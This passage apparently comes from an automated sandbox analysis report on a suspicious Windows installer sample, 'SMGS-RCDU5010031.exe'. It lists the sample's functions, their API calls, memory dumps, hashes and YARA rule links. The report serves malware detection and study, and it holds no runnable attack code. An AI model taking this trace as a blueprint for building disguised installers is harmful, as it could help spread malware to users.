                                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 00405536
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556A
                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 0040557B
                                                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040558F
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004055AF
                                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055C8
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405600
                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405610
                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00405616
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405622
                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0040562C
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405640
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405660
                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 0040566B
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00405671
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                          • String ID: {
                                                                                                                                                                                                          • API String ID: 590372296-366298937
                                                                                                                                                                                                          • Opcode ID: c4b52b2e618ac1b4ceb8eccc4828d65ce2d69768586c872b5e4af6598ace69d9
                                                                                                                                                                                                          • Instruction ID: 691c8e7aa241a152ccc1fa1da29986a8db7386483fecbbc97dabe6f77f48909a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4b52b2e618ac1b4ceb8eccc4828d65ce2d69768586c872b5e4af6598ace69d9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4B14971800608BFDB119FA0DD89EAE7B79FB48355F00803AFA41BA1A0CB755E51DF68
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004045AF Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 004045FE
                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404628
                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 004046D9
                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 004046E4
                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404716
                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404722
                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404734
                                                                                                                                                                                                            • Part of subcall function 00405779: GetDlgItemTextW.USER32(?,?,00000400,0040476B), ref: 0040578C
                                                                                                                                                                                                            • Part of subcall function 004062E4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75BA3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                                                                                                                                                                            • Part of subcall function 004062E4: CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                                                                                                                                                                            • Part of subcall function 004062E4: CharNextW.USER32(?,00000000,75BA3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                                                                                                                                                                            • Part of subcall function 004062E4: CharPrevW.USER32(?,?,75BA3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,?,0042B218,?,?,000003FB,?), ref: 004047F7
                                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404812
                                                                                                                                                                                                            • Part of subcall function 0040496B: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                                                                                                                                                                            • Part of subcall function 0040496B: wsprintfW.USER32 ref: 00404A15
                                                                                                                                                                                                            • Part of subcall function 0040496B: SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                          • String ID: A$C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114$Call
                                                                                                                                                                                                          • API String ID: 2624150263-211385702
                                                                                                                                                                                                          • Opcode ID: 7c84fd604c64be66d5e66193ff5fa4d290b9f71cf9d700dc6b5080d1f641d0f0
                                                                                                                                                                                                          • Instruction ID: d238959ebaf25b01a045b7410cfe39ad7a074a1c0e4d09bd35cd2a97c430e078
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c84fd604c64be66d5e66193ff5fa4d290b9f71cf9d700dc6b5080d1f641d0f0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25A171B1900209ABDB11AFA5CD85AAFB7B8EF85314F10843BF601B72D1D77C89418B6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4227406936-0
                                                                                                                                                                                                          • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                                                                                          • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CoCreateInstance.OLE32(004085F0,?,?,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes, xrefs: 00402154
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes
                                                                                                                                                                                                          • API String ID: 542301482-2590807967
                                                                                                                                                                                                          • Opcode ID: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
                                                                                                                                                                                                          • Instruction ID: c02b05589a316e099dfb0d7529d526a00835c5092bff723ddb1c3c0439b696db
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5412A71A00208AFCF00DFA4CD88AAD7BB6FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                          • Opcode ID: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
                                                                                                                                                                                                          • Instruction ID: 34d4ac1ca0ba7345d9811ef03afe410f99a72e11e7e6ea98f315d3ade0c6d005
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a81ee3202ab0ebdc7edd9b8add70fe35bba4a5d97339da7cd4a9b36177af59e9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32F08C71A012149BDB01EBA4DE49AAEB378FF45324F20457BE105F21E1E7B89A409B29
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406869 Relevance: .3, Instructions: 334COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                                          • Instruction ID: c1774f2f946c4964f784778ac851d6f11cf56bcc8977249e4dfbf1b2b48c2d4a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2E17A71A0070ADFDB24CF58C880BAAB7F5EF45305F15892EE497A7291D738AA91CF14
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004042B1 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040434F
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404363
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404380
                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00404391
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040439F
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043AD
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004043B2
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043BF
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D4
                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040442D
                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 00404434
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040445F
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A2
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004044B0
                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004044B3
                                                                                                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,00432E80,00000000,00000000,?), ref: 004044C8
                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004044D4
                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004044D7
                                                                                                                                                                                                          • SendMessageW.USER32(00000111,?,00000000), ref: 00404506
                                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404518
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                                          • String ID: (B@$Call$N$open
                                                                                                                                                                                                          • API String ID: 3615053054-1706805125
                                                                                                                                                                                                          • Opcode ID: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
                                                                                                                                                                                                          • Instruction ID: 98cd9110a96fdc90c980e8b88af1c06473e6a142e5aecddf25117f52f4c400a7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 217181B1900209BFDB109F60DD89AAA7B79FB84745F00803AF745B62D1C778AD51CFA8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                          • DrawTextW.USER32(00000000,Snubbendes Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                          • String ID: F$Snubbendes Setup
                                                                                                                                                                                                          • API String ID: 941294808-2339128912
                                                                                                                                                                                                          • Opcode ID: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                                                                                                                                                                          • Instruction ID: 99fcf956b6c6492db4cb7183bc7c026c58e5ce6762c1973727186ff321cad974
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81418A71800209AFCF058F95DE459AFBBB9FF44315F04842EF991AA1A0C778EA54DFA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405D7F Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrcpyW.KERNEL32(004308E8,NUL), ref: 00405D8E
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,00405F12,?,?), ref: 00405DB2
                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405DBB
                                                                                                                                                                                                            • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
